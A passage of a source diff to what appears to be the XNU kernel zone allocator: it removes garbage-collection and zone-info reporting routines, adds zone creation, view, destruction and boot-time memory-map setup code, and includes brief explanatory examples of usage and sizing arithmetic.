-       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
-
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) {
-               kprintf("zone_gc() of zone %s%s freed %lu elements, %d pages\n",
-                   zone_heap_name(z), z->z_name,
-                   (unsigned long)(ptoa(total_freed_pages) / z->pcpu_elem_size),
-                   total_freed_pages);
-       }
-#endif /* DEBUG || DEVELOPMENT */
-}
-
-/*     Zone garbage collection
- *
- *     zone_gc will walk through all the free elements in all the
- *     zones that are marked collectable looking for reclaimable
- *     pages.  zone_gc is called by consider_zone_gc when the system
- *     begins to run out of memory.
- *
- *     We should ensure that zone_gc never blocks.
- */
-void
-zone_gc(boolean_t consider_jetsams)
-{
-       if (consider_jetsams) {
-               kill_process_in_largest_zone();
-               /*
-                * If we do end up jetsamming something, we need to do a zone_gc so that
-                * we can reclaim free zone elements and update the zone map size.
-                * Fall through.
-                */
        }
 
-       lck_mtx_lock(&zone_gc_lock);
-
-#if DEBUG || DEVELOPMENT
-       if (zalloc_debug & ZALLOC_DEBUG_ZONEGC) {
-               kprintf("zone_gc() starting...\n");
-       }
-#endif /* DEBUG || DEVELOPMENT */
-
-       zone_index_foreach(i) {
-               zone_t z = &zone_array[i];
-
-               if (!z->collectable) {
-                       continue;
-               }
-#if CONFIG_ZCACHE
-               if (zone_caching_enabled(z)) {
-                       zcache_drain_depot(z);
-               }
-#endif /* CONFIG_ZCACHE */
-               if (zone_pva_is_null(z->pages_all_free)) {
-                       continue;
+       if (zp_factor != 0 && !z->z_free_zeroes) {
+               if (__probable(zone_array[ZONE_ID_PERCPU_PERMANENT].z_self)) {
+                       zpercpu_foreach(zs, z->z_stats) {
+                               zs->zs_poison_seqno = zone_poison_count_init(z);
+                       }
+               } else {
+                       zone_stats_startup[zid].zs_poison_seqno =
+                           zone_poison_count_init(z);
                }
-
-               zone_drop_free_elements(z);
        }
 
-       lck_mtx_unlock(&zone_gc_lock);
-}
+       zone_lock(z);
+       z->z_self = z;
+       zone_unlock(z);
 
-/*
- *     consider_zone_gc:
- *
- *     Called by the pageout daemon when the system needs more free pages.
- */
+       return z;
+}
 
+__startup_func
 void
-consider_zone_gc(boolean_t consider_jetsams)
+zone_create_startup(struct zone_create_startup_spec *spec)
 {
-       /*
-        * One-time reclaim of kernel_map resources we allocated in
-        * early boot.
-        *
-        * Use atomic exchange in case multiple threads race into here.
-        */
-       vm_offset_t deallocate_kaddr;
-       if (kmapoff_kaddr != 0 &&
-           (deallocate_kaddr = os_atomic_xchg(&kmapoff_kaddr, 0, relaxed)) != 0) {
-               vm_deallocate(kernel_map, deallocate_kaddr, ptoa_64(kmapoff_pgcnt));
-       }
-
-       zone_gc(consider_jetsams);
+       *spec->z_var = zone_create_ext(spec->z_name, spec->z_size,
+           spec->z_flags, spec->z_zid, spec->z_setup);
 }
 
 /*
- * Creates a vm_map_copy_t to return to the caller of mach_* MIG calls
- * requesting zone information.
- * Frees unused pages towards the end of the region, and zero'es out unused
- * space on the last page.
+ * The first 4 fields of a zone_view and a zone alias, so that the zone_or_view_t
+ * union works. Trust, but verify.
  */
-static vm_map_copy_t
-create_vm_map_copy(
-       vm_offset_t             start_addr,
-       vm_size_t               total_size,
-       vm_size_t               used_size)
-{
-       kern_return_t   kr;
-       vm_offset_t             end_addr;
-       vm_size_t               free_size;
-       vm_map_copy_t   copy;
-
-       if (used_size != total_size) {
-               end_addr = start_addr + used_size;
-               free_size = total_size - (round_page(end_addr) - start_addr);
-
-               if (free_size >= PAGE_SIZE) {
-                       kmem_free(ipc_kernel_map,
-                           round_page(end_addr), free_size);
-               }
-               bzero((char *) end_addr, round_page(end_addr) - end_addr);
-       }
-
-       kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)start_addr,
-           (vm_map_size_t)used_size, TRUE, &copy);
-       assert(kr == KERN_SUCCESS);
-
-       return copy;
-}
+#define zalloc_check_zov_alias(f1, f2) \
+    static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2))
+zalloc_check_zov_alias(z_self, zv_zone);
+zalloc_check_zov_alias(z_stats, zv_stats);
+zalloc_check_zov_alias(z_name, zv_name);
+zalloc_check_zov_alias(z_views, zv_next);
+#undef zalloc_check_zov_alias
 
-static boolean_t
-get_zone_info(
-       zone_t                   z,
-       mach_zone_name_t        *zn,
-       mach_zone_info_t        *zi)
+__startup_func
+void
+zone_view_startup_init(struct zone_view_startup_spec *spec)
 {
-       struct zone zcopy;
+       struct kalloc_heap *heap = NULL;
+       zone_view_t zv = spec->zv_view;
+       zone_t z;
 
-       assert(z != ZONE_NULL);
-       lock_zone(z);
-       if (!z->z_self) {
-               unlock_zone(z);
-               return FALSE;
+       switch (spec->zv_heapid) {
+       case KHEAP_ID_DEFAULT:
+               heap = KHEAP_DEFAULT;
+               break;
+       case KHEAP_ID_DATA_BUFFERS:
+               heap = KHEAP_DATA_BUFFERS;
+               break;
+       case KHEAP_ID_KEXT:
+               heap = KHEAP_KEXT;
+               break;
+       default:
+               heap = NULL;
        }
-       zcopy = *z;
-       unlock_zone(z);
-
-       if (zn != NULL) {
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
 
-               /* assuming here the name data is static */
-               (void) __nosan_strlcpy(zn->mzn_name, temp_zone_name,
-                   strlen(temp_zone_name) + 1);
+       if (heap) {
+               z = kalloc_heap_zone_for_size(heap, spec->zv_size);
+               assert(z);
+       } else {
+               z = spec->zv_zone;
+               assert(spec->zv_size <= zone_elem_size(z));
        }
 
-       if (zi != NULL) {
-               *zi = (mach_zone_info_t) {
-                       .mzi_count = zone_count_allocated(&zcopy),
-                       .mzi_cur_size = ptoa_64(zcopy.page_count),
-                       // max_size for zprint is now high-watermark of pages used
-                       .mzi_max_size = ptoa_64(zcopy.page_count_hwm),
-                       .mzi_elem_size = zcopy.pcpu_elem_size,
-                       .mzi_alloc_size = ptoa_64(zcopy.alloc_pages),
-                       .mzi_exhaustible = (uint64_t)zcopy.exhaustible,
-               };
-               zpercpu_foreach(zs, zcopy.z_stats) {
-                       zi->mzi_sum_size += zs->zs_mem_allocated;
-               }
-               if (zcopy.collectable) {
-                       SET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable,
-                           ptoa_64(zcopy.allfree_page_count));
-                       SET_MZI_COLLECTABLE_FLAG(zi->mzi_collectable, TRUE);
-               }
+       zv->zv_zone  = z;
+       zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats);
+       zv->zv_next  = z->z_views;
+       if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) {
+               /*
+                * Count the raw view for zones not in a heap;
+                * kalloc_heap_init() already counts it for its members.
+                */
+               zone_view_count += 2;
+       } else {
+               zone_view_count += 1;
        }
-
-       return TRUE;
+       z->z_views = zv;
 }
 
-kern_return_t
-task_zone_info(
-       __unused task_t                                 task,
-       __unused mach_zone_name_array_t *namesp,
-       __unused mach_msg_type_number_t *namesCntp,
-       __unused task_zone_info_array_t *infop,
-       __unused mach_msg_type_number_t *infoCntp)
+zone_t
+zone_create(
+       const char             *name,
+       vm_size_t               size,
+       zone_create_flags_t     flags)
 {
-       return KERN_FAILURE;
+       return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL);
 }
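A hypothetical call site, to show how the KPI above is meant to be used; the struct, the zone name and the choice of ZC_ZFREE_CLEARMEM are made up for illustration.

#include <kern/zalloc.h>

struct my_record {
        uint64_t  id;
        void     *owner;
};

static zone_t my_record_zone;

static void
my_subsystem_init(void)
{
        my_record_zone = zone_create("my.subsystem.record",
            sizeof(struct my_record), ZC_ZFREE_CLEARMEM);
}

Elements would then come from zalloc()/zfree() against that zone; per the flag handling in zone_create_ext() above, ZC_ZFREE_CLEARMEM makes the allocator zero each element when it is freed.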
 
-kern_return_t
-mach_zone_info(
-       host_priv_t             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp,
-       mach_zone_info_array_t  *infop,
-       mach_msg_type_number_t  *infoCntp)
+zone_t
+zinit(
+       vm_size_t       size,           /* the size of an element */
+       vm_size_t       max,            /* maximum memory to use */
+       vm_size_t       alloc __unused, /* allocation size */
+       const char      *name)          /* a name for the zone */
 {
-       return mach_memory_info(host, namesp, namesCntp, infop, infoCntp, NULL, NULL);
+       zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE);
+       z->z_wired_max = zone_alloc_pages_for_nelems(z, max / size);
+       return z;
 }
 
-
-kern_return_t
-mach_memory_info(
-       host_priv_t             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp,
-       mach_zone_info_array_t  *infop,
-       mach_msg_type_number_t  *infoCntp,
-       mach_memory_info_array_t *memoryInfop,
-       mach_msg_type_number_t   *memoryInfoCntp)
+void
+zdestroy(zone_t z)
 {
-       mach_zone_name_t        *names;
-       vm_offset_t             names_addr;
-       vm_size_t               names_size;
-
-       mach_zone_info_t        *info;
-       vm_offset_t             info_addr;
-       vm_size_t               info_size;
+       unsigned int zindex = zone_index(z);
 
-       mach_memory_info_t      *memory_info;
-       vm_offset_t             memory_info_addr;
-       vm_size_t               memory_info_size;
-       vm_size_t               memory_info_vmsize;
-       unsigned int            num_info;
+       current_thread()->options |= TH_OPT_ZONE_PRIV;
+       lck_mtx_lock(&zone_gc_lock);
 
-       unsigned int            max_zones, used_zones, i;
-       mach_zone_name_t        *zn;
-       mach_zone_info_t        *zi;
-       kern_return_t           kr;
+       zone_reclaim(z, ZONE_RECLAIM_DESTROY);
 
-       uint64_t                zones_collectable_bytes = 0;
+       lck_mtx_unlock(&zone_gc_lock);
+       current_thread()->options &= ~TH_OPT_ZONE_PRIV;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
+#if CONFIG_GZALLOC
+       if (__improbable(z->gzalloc_tracked)) {
+               /* If the zone is gzalloc-managed, dump all the elements in the free cache */
+               gzalloc_empty_free_cache(z);
        }
 #endif
 
-       /*
-        *      We assume that zones aren't freed once allocated.
-        *      We won't pick up any zones that are allocated later.
-        */
+       zone_lock(z);
 
-       max_zones = os_atomic_load(&num_zones, relaxed);
+       while (!zone_pva_is_null(z->z_pageq_va)) {
+               struct zone_page_metadata *meta;
+               vm_offset_t free_addr;
 
-       names_size = round_page(max_zones * sizeof *names);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &names_addr, names_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               return kr;
+               zone_counter_sub(z, z_va_cur, z->z_percpu ? 1 : z->z_chunk_pages);
+               meta = zone_meta_queue_pop_native(z, &z->z_pageq_va, &free_addr);
+               assert(meta->zm_chunk_len <= ZM_CHUNK_LEN_MAX);
+               bzero(meta, sizeof(*meta) * z->z_chunk_pages);
+               zone_unlock(z);
+               kmem_free(zone_submap(z), free_addr, ptoa(z->z_chunk_pages));
+               zone_lock(z);
        }
-       names = (mach_zone_name_t *) names_addr;
 
-       info_size = round_page(max_zones * sizeof *info);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &info_addr, info_size, VM_KERN_MEMORY_IPC);
-       if (kr != KERN_SUCCESS) {
-               kmem_free(ipc_kernel_map,
-                   names_addr, names_size);
-               return kr;
+#if !KASAN_ZALLOC
+       /* Assert that all counts are zero */
+       if (z->z_elems_avail || z->z_elems_free ||
+           zone_size_wired(z) || z->z_va_cur) {
+               panic("zdestroy: Zone %s%s isn't empty at zdestroy() time",
+                   zone_heap_name(z), z->z_name);
        }
-       info = (mach_zone_info_t *) info_addr;
 
-       zn = &names[0];
-       zi = &info[0];
+       /* consistency check: make sure everything is indeed empty */
+       assert(zone_pva_is_null(z->z_pageq_empty));
+       assert(zone_pva_is_null(z->z_pageq_partial));
+       assert(zone_pva_is_null(z->z_pageq_full));
+       assert(zone_pva_is_null(z->z_pageq_va));
+#endif
 
-       used_zones = max_zones;
-       for (i = 0; i < max_zones; i++) {
-               if (!get_zone_info(&(zone_array[i]), zn, zi)) {
-                       used_zones--;
-                       continue;
-               }
-               zones_collectable_bytes += GET_MZI_COLLECTABLE_BYTES(zi->mzi_collectable);
-               zn++;
-               zi++;
-       }
+       zone_unlock(z);
 
-       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, used_zones * sizeof *names);
-       *namesCntp = used_zones;
+       simple_lock(&all_zones_lock, &zone_locks_grp);
 
-       *infop = (mach_zone_info_t *) create_vm_map_copy(info_addr, info_size, used_zones * sizeof *info);
-       *infoCntp = used_zones;
+       assert(!bitmap_test(zone_destroyed_bitmap, zindex));
+       /* Mark the zone as empty in the bitmap */
+       bitmap_set(zone_destroyed_bitmap, zindex);
+       num_zones_in_use--;
+       assert(num_zones_in_use > 0);
 
-       num_info = 0;
-       memory_info_addr = 0;
+       simple_unlock(&all_zones_lock);
+}
 
-       if (memoryInfop && memoryInfoCntp) {
-               vm_map_copy_t           copy;
-               num_info = vm_page_diagnose_estimate();
-               memory_info_size = num_info * sizeof(*memory_info);
-               memory_info_vmsize = round_page(memory_info_size);
-               kr = kmem_alloc_pageable(ipc_kernel_map,
-                   &memory_info_addr, memory_info_vmsize, VM_KERN_MEMORY_IPC);
-               if (kr != KERN_SUCCESS) {
-                       return kr;
-               }
+#endif /* !ZALLOC_TEST */
+#pragma mark zalloc module init
+#if !ZALLOC_TEST
 
-               kr = vm_map_wire_kernel(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize,
-                   VM_PROT_READ | VM_PROT_WRITE, VM_KERN_MEMORY_IPC, FALSE);
-               assert(kr == KERN_SUCCESS);
+/*
+ *     Initialize the "zone of zones" which uses fixed memory allocated
+ *     earlier in memory initialization.  zone_bootstrap is called
+ *     before zone_init.
+ */
+__startup_func
+void
+zone_bootstrap(void)
+{
+       /* Validate struct zone_packed_virtual_address expectations */
+       static_assert((intptr_t)VM_MIN_KERNEL_ADDRESS < 0, "the top bit must be 1");
+       if (VM_KERNEL_POINTER_SIGNIFICANT_BITS - PAGE_SHIFT > 31) {
+               panic("zone_pva_t can't pack a kernel page address in 31 bits");
+       }
 
-               memory_info = (mach_memory_info_t *) memory_info_addr;
-               vm_page_diagnose(memory_info, num_info, zones_collectable_bytes);
+       zpercpu_early_count = ml_early_cpu_max_number() + 1;
 
-               kr = vm_map_unwire(ipc_kernel_map, memory_info_addr, memory_info_addr + memory_info_vmsize, FALSE);
-               assert(kr == KERN_SUCCESS);
+       /* Set up zone element poisoning */
+       zp_bootstrap();
 
-               kr = vm_map_copyin(ipc_kernel_map, (vm_map_address_t)memory_info_addr,
-                   (vm_map_size_t)memory_info_size, TRUE, &copy);
-               assert(kr == KERN_SUCCESS);
+       /*
+        * The KASAN quarantine for kalloc doesn't understand heaps
+        * and trips the heap confusion panics. At the end of the day,
+        * all these security measures are redundant with KASAN.
+        *
+        * On 32-bit kernels, these protections are just too expensive.
+        */
+#if !defined(__LP64__) || KASAN_ZALLOC
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER;
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SUBMAP_USER_DATA;
+       zsecurity_options &= ~ZSECURITY_OPTIONS_SEQUESTER_KEXT_KALLOC;
+#endif
 
-               *memoryInfop = (mach_memory_info_t *) copy;
-               *memoryInfoCntp = num_info;
-       }
+       thread_call_setup_with_options(&zone_expand_callout,
+           zone_expand_async, NULL, THREAD_CALL_PRIORITY_HIGH,
+           THREAD_CALL_OPTIONS_ONCE);
+
+       thread_call_setup_with_options(&zone_defrag_callout,
+           zone_defrag_async, NULL, THREAD_CALL_PRIORITY_USER,
+           THREAD_CALL_OPTIONS_ONCE);
+}
+
+#if __LP64__
+#if ARM_LARGE_MEMORY || __x86_64__
+#define ZONE_MAP_VIRTUAL_SIZE_LP64      (128ULL * 1024ULL * 1024 * 1024)
+#else
+#define ZONE_MAP_VIRTUAL_SIZE_LP64      (32ULL * 1024ULL * 1024 * 1024)
+#endif
+#endif /* __LP64__ */
 
-       return KERN_SUCCESS;
-}
+#define ZONE_GUARD_SIZE                 (64UL << 10)
 
-kern_return_t
-mach_zone_info_for_zone(
-       host_priv_t                     host,
-       mach_zone_name_t        name,
-       mach_zone_info_t        *infop)
+#if __LP64__
+static inline vm_offset_t
+zone_restricted_va_max(void)
 {
-       zone_t zone_ptr;
+       vm_offset_t compressor_max = VM_PACKING_MAX_PACKABLE(C_SLOT_PACKED_PTR);
+       vm_offset_t vm_page_max    = VM_PACKING_MAX_PACKABLE(VM_PAGE_PACKED_PTR);
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
-       }
+       return trunc_page(MIN(compressor_max, vm_page_max));
+}
 #endif
 
-       if (infop == NULL) {
-               return KERN_INVALID_ARGUMENT;
+__startup_func
+static void
+zone_tunables_fixup(void)
+{
+       if (zone_map_jetsam_limit == 0 || zone_map_jetsam_limit > 100) {
+               zone_map_jetsam_limit = ZONE_MAP_JETSAM_LIMIT_DEFAULT;
        }
+       if (zc_magazine_size > PAGE_SIZE / ZONE_MIN_ELEM_SIZE) {
+               zc_magazine_size = (uint16_t)(PAGE_SIZE / ZONE_MIN_ELEM_SIZE);
+       }
+}
+STARTUP(TUNABLES, STARTUP_RANK_MIDDLE, zone_tunables_fixup);
 
-       zone_ptr = ZONE_NULL;
-       zone_index_foreach(i) {
-               zone_t z = &(zone_array[i]);
-               assert(z != ZONE_NULL);
-
-               /*
-                * Append kalloc heap name to zone name (if zone is used by kalloc)
-                */
-               char temp_zone_name[MAX_ZONE_NAME] = "";
-               snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s",
-                   zone_heap_name(z), z->z_name);
+__startup_func
+static vm_size_t
+zone_phys_size_max(void)
+{
+       vm_size_t zsize;
+       vm_size_t zsizearg;
 
-               /* Find the requested zone by name */
-               if (track_this_zone(temp_zone_name, name.mzn_name)) {
-                       zone_ptr = z;
-                       break;
-               }
+       if (PE_parse_boot_argn("zsize", &zsizearg, sizeof(zsizearg))) {
+               zsize = zsizearg * (1024ULL * 1024);
+       } else {
+               /* Set target zone size as 1/4 of physical memory */
+               zsize = (vm_size_t)(sane_size >> 2);
+#if defined(__LP64__)
+               zsize += zsize >> 1;
+#endif /* __LP64__ */
        }
 
-       /* No zones found with the requested zone name */
-       if (zone_ptr == ZONE_NULL) {
-               return KERN_INVALID_ARGUMENT;
+       if (zsize < CONFIG_ZONE_MAP_MIN) {
+               zsize = CONFIG_ZONE_MAP_MIN;   /* Clamp to min */
        }
-
-       if (get_zone_info(zone_ptr, NULL, infop)) {
-               return KERN_SUCCESS;
+       if (zsize > sane_size >> 1) {
+               zsize = (vm_size_t)(sane_size >> 1); /* Clamp to half of RAM max */
        }
-       return KERN_FAILURE;
+       if (zsizearg == 0 && zsize > ZONE_MAP_MAX) {
+               /* if zsize boot-arg not present and zsize exceeds platform maximum, clip zsize */
+               printf("NOTE: zonemap size reduced from 0x%lx to 0x%lx\n",
+                   (uintptr_t)zsize, (uintptr_t)ZONE_MAP_MAX);
+               zsize = ZONE_MAP_MAX;
+       }
+
+       return (vm_size_t)trunc_page(zsize);
 }
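As a worked example, on a hypothetical LP64 machine with sane_size of 8GB and no zsize boot-arg: 8GB >> 2 gives 2GB, the LP64 bump adds half again for 3GB, which stays under the half-of-RAM ceiling of 4GB, so the target is 3GB (still subject to the CONFIG_ZONE_MAP_MIN and ZONE_MAP_MAX clamps).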
 
-kern_return_t
-mach_zone_info_for_largest_zone(
-       host_priv_t                     host,
-       mach_zone_name_t        *namep,
-       mach_zone_info_t        *infop)
+__options_decl(zone_init_allocate_flags_t, unsigned, {
+       ZIA_NONE      = 0x00000000,
+       ZIA_REPLACE   = 0x00000001, /* replace a previous non permanent range */
+       ZIA_RANDOM    = 0x00000002, /* place at a random address              */
+       ZIA_PERMANENT = 0x00000004, /* permanent allocation                   */
+       ZIA_GUARD     = 0x00000008, /* will be used as a guard                */
+});
+
+__startup_func
+static struct zone_map_range
+zone_init_allocate_va(vm_map_address_t addr, vm_size_t size,
+    zone_init_allocate_flags_t flags)
 {
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
+       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       int vm_alloc_flags = 0;
+       struct zone_map_range r;
+       kern_return_t kr;
+
+       if (flags & ZIA_REPLACE) {
+               vm_alloc_flags |= VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE;
+       } else {
+               vm_alloc_flags |= VM_FLAGS_ANYWHERE;
        }
-#if CONFIG_DEBUGGER_FOR_ZONE_INFO
-       if (!PE_i_can_has_debugger(NULL)) {
-               return KERN_INVALID_HOST;
+       if (flags & ZIA_RANDOM) {
+               vm_alloc_flags |= VM_FLAGS_RANDOM_ADDR;
        }
-#endif
-
-       if (namep == NULL || infop == NULL) {
-               return KERN_INVALID_ARGUMENT;
+       if (flags & ZIA_PERMANENT) {
+               vmk_flags.vmkf_permanent = true;
        }
 
-       if (get_zone_info(zone_find_largest(), namep, infop)) {
-               return KERN_SUCCESS;
-       }
-       return KERN_FAILURE;
-}
+       vm_object_reference(kernel_object);
 
-uint64_t
-get_zones_collectable_bytes(void)
-{
-       uint64_t zones_collectable_bytes = 0;
-       mach_zone_info_t zi;
+       kr = vm_map_enter(kernel_map, &addr, size, 0,
+           vm_alloc_flags, vmk_flags, VM_KERN_MEMORY_ZONE,
+           kernel_object, 0, FALSE,
+           (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT,
+           (flags & ZIA_GUARD) ? VM_PROT_NONE : VM_PROT_DEFAULT,
+           VM_INHERIT_NONE);
 
-       zone_index_foreach(i) {
-               if (get_zone_info(&zone_array[i], NULL, &zi)) {
-                       zones_collectable_bytes +=
-                           GET_MZI_COLLECTABLE_BYTES(zi.mzi_collectable);
-               }
+       if (KERN_SUCCESS != kr) {
+               panic("vm_map_enter(0x%zx) failed: %d", (size_t)size, kr);
        }
 
-       return zones_collectable_bytes;
+       r.min_address = (vm_offset_t)addr;
+       r.max_address = (vm_offset_t)addr + size;
+       return r;
 }
 
-kern_return_t
-mach_zone_get_zlog_zones(
-       host_priv_t                             host,
-       mach_zone_name_array_t  *namesp,
-       mach_msg_type_number_t  *namesCntp)
+__startup_func
+static void
+zone_submap_init(
+       vm_offset_t *submap_min,
+       unsigned    idx,
+       uint64_t    zone_sub_map_numer,
+       uint64_t    *remaining_denom,
+       vm_offset_t *remaining_size,
+       vm_size_t   guard_size)
 {
-#if ZONE_ENABLE_LOGGING
-       unsigned int max_zones, logged_zones, i;
+       vm_offset_t submap_start, submap_end;
+       vm_size_t submap_size;
+       vm_map_t  submap;
        kern_return_t kr;
-       zone_t zone_ptr;
-       mach_zone_name_t *names;
-       vm_offset_t names_addr;
-       vm_size_t names_size;
 
-       if (host == HOST_NULL) {
-               return KERN_INVALID_HOST;
-       }
+       submap_size = trunc_page(zone_sub_map_numer * *remaining_size /
+           *remaining_denom);
+       submap_start = *submap_min;
+       submap_end = submap_start + submap_size;
 
-       if (namesp == NULL || namesCntp == NULL) {
-               return KERN_INVALID_ARGUMENT;
-       }
+#if defined(__LP64__)
+       if (idx == Z_SUBMAP_IDX_VA_RESTRICTED) {
+               vm_offset_t restricted_va_max = zone_restricted_va_max();
+               if (submap_end > restricted_va_max) {
+#if DEBUG || DEVELOPMENT
+                       printf("zone_init: submap[%d] clipped to %zdM of %zdM\n", idx,
+                           (size_t)(restricted_va_max - submap_start) >> 20,
+                           (size_t)submap_size >> 20);
+#endif /* DEBUG || DEVELOPMENT */
+                       guard_size += submap_end - restricted_va_max;
+                       *remaining_size -= submap_end - restricted_va_max;
+                       submap_end  = restricted_va_max;
+                       submap_size = restricted_va_max - submap_start;
+               }
 
-       max_zones = os_atomic_load(&num_zones, relaxed);
+               vm_packing_verify_range("vm_compressor",
+                   submap_start, submap_end, VM_PACKING_PARAMS(C_SLOT_PACKED_PTR));
+               vm_packing_verify_range("vm_page",
+                   submap_start, submap_end, VM_PACKING_PARAMS(VM_PAGE_PACKED_PTR));
+       }
+#endif /* defined(__LP64__) */
 
-       names_size = round_page(max_zones * sizeof *names);
-       kr = kmem_alloc_pageable(ipc_kernel_map,
-           &names_addr, names_size, VM_KERN_MEMORY_IPC);
+       vm_map_kernel_flags_t vmk_flags = VM_MAP_KERNEL_FLAGS_NONE;
+       vmk_flags.vmkf_permanent = TRUE;
+       kr = kmem_suballoc(kernel_map, submap_min, submap_size,
+           FALSE, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, vmk_flags,
+           VM_KERN_MEMORY_ZONE, &submap);
        if (kr != KERN_SUCCESS) {
-               return kr;
+               panic("kmem_suballoc(kernel_map[%d] %p:%p) failed: %d",
+                   idx, (void *)submap_start, (void *)submap_end, kr);
        }
-       names = (mach_zone_name_t *) names_addr;
 
-       zone_ptr = ZONE_NULL;
-       logged_zones = 0;
-       for (i = 0; i < max_zones; i++) {
-               zone_t z = &(zone_array[i]);
-               assert(z != ZONE_NULL);
+#if DEBUG || DEVELOPMENT
+       printf("zone_init: submap[%d] %p:%p (%zuM)\n",
+           idx, (void *)submap_start, (void *)submap_end,
+           (size_t)submap_size >> 20);
+#endif /* DEBUG || DEVELOPMENT */
 
-               /* Copy out the zone name if zone logging is enabled */
-               if (z->zlog_btlog) {
-                       get_zone_info(z, &names[logged_zones], NULL);
-                       logged_zones++;
-               }
+       zone_init_allocate_va(submap_end, guard_size,
+           ZIA_PERMANENT | ZIA_GUARD | ZIA_REPLACE);
+
+       zone_submaps[idx] = submap;
+       *submap_min       = submap_end + guard_size;
+       *remaining_size  -= submap_size;
+       *remaining_denom -= zone_sub_map_numer;
+}
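Ignoring the guard pages and page truncation, the proportional carving above behaves like the sketch below for the LP64 ratios used in zone_init() further down (20/40/40, assuming all three submaps are enabled so the denominator is 100): each call takes its numerator's share of whatever VA remains, so the three submaps end up with 20%, 40% and 40% of the budget.

#include <stdio.h>

int
main(void)
{
        /* Sketch of the proportional carve-out, over a hypothetical 128GB budget. */
        unsigned long long remaining = 128ULL << 30;
        unsigned long long denom = 100;
        unsigned long long ratios[] = { 20, 40, 40 };

        for (int i = 0; i < 3; i++) {
                unsigned long long sz = ratios[i] * remaining / denom;
                printf("submap[%d]: ~%llu GB\n", i, sz >> 30);
                remaining -= sz;
                denom -= ratios[i];
        }
        return 0;
}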
+
+/*
+ * Allocate metadata array and migrate foreign initial metadata.
+ *
+ * So that foreign pages and native pages have the same scheme,
+ * we allocate VA space that covers both foreign and native pages.
+ */
+__startup_func
+static void
+zone_metadata_init(void)
+{
+       struct zone_map_range r0 = zone_info.zi_map_range[0];
+       struct zone_map_range r1 = zone_info.zi_map_range[1];
+       struct zone_map_range mr, br;
+       vm_size_t meta_size, bits_size, foreign_base;
+       vm_offset_t hstart, hend;
+
+       if (r0.min_address > r1.min_address) {
+               r0 = zone_info.zi_map_range[1];
+               r1 = zone_info.zi_map_range[0];
        }
 
-       *namesp = (mach_zone_name_t *) create_vm_map_copy(names_addr, names_size, logged_zones * sizeof *names);
-       *namesCntp = logged_zones;
+       meta_size = round_page(atop(r1.max_address - r0.min_address) *
+           sizeof(struct zone_page_metadata)) + ZONE_GUARD_SIZE * 2;
 
-       return KERN_SUCCESS;
+       /*
+        * Allocations can't be smaller than 8 bytes, which means at most
+        * 128 bits (16 bytes) of bitmap per 1KiB of physical memory (16MB per 1GB).
+        *
+        * Let's preallocate for the worst case to avoid weird panics.
+        */
+       bits_size = round_page(16 * (ptoa(zone_phys_mapped_max_pages) >> 10));
 
-#else /* ZONE_ENABLE_LOGGING */
-#pragma unused(host, namesp, namesCntp)
-       return KERN_FAILURE;
-#endif /* ZONE_ENABLE_LOGGING */
-}
+       /*
+        * Compute the size of the "hole" in the middle of the range.
+        *
+        * If it is smaller than 256k, just leave it be, with this layout:
+        *
+        *   [G][ r0 meta ][ hole ][ r1 meta ][ bits ][G]
+        *
+        * else punch a hole with guard pages around the hole, and place the
+        * bits in the hole if it fits, or after r1 otherwise, yielding either
+        * of the following layouts:
+        *
+        *      |__________________hend____________|
+        *      |__hstart_|                        |
+        *   [G][ r0 meta ][ bits ][G]..........[G][ r1 meta ][G]
+        *   [G][ r0 meta ][G]..................[G][ r1 meta ][ bits ][G]
+        */
+       hstart = round_page(atop(r0.max_address - r0.min_address) *
+           sizeof(struct zone_page_metadata));
+       hend = trunc_page(atop(r1.min_address - r0.min_address) *
+           sizeof(struct zone_page_metadata));
+
+       if (hstart >= hend || hend - hstart < (256ul << 10)) {
+               mr = zone_init_allocate_va(0, meta_size + bits_size,
+                   ZIA_PERMANENT | ZIA_RANDOM);
+               mr.min_address += ZONE_GUARD_SIZE;
+               mr.max_address -= ZONE_GUARD_SIZE;
+               br.max_address  = mr.max_address;
+               mr.max_address -= bits_size;
+               br.min_address  = mr.max_address;
 
-kern_return_t
-mach_zone_get_btlog_records(
-       host_priv_t                             host,
-       mach_zone_name_t                name,
-       zone_btrecord_array_t   *recsp,
-       mach_msg_type_number_t  *recsCntp)
-{
 #if DEBUG || DEVELOPMENT
-       unsigned int numrecs = 0;
-       zone_btrecord_t *recs;
-       kern_return_t kr;
-       zone_t zone_ptr;
-       vm_offset_t recs_addr;
-       vm_size_t recs_size;
+               printf("zone_init: metadata  %p:%p (%zuK)\n",
